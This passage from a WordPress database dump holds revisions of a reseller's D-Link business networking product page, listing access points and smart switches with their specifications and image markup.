04:46:19','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3380,1,'2019-09-25 12:50:36','2019-09-25 04:50:36','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:50:36','2019-09-25 04:50:36','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3409,1,'2019-09-25 14:36:36','2019-09-25 06:36:36','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		High-speed wireless performance with 300 Mbps wireless signal rates\nSupport Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications\nGigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client\nSupport Inbuilt Radius server, Network Access protection (NAP)\nEquipped with 8 VLANs per band for multiple SSIDsÂ  Implementation\nSupport Central WiFi Manager to configure and manage multiple AP\n<center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, 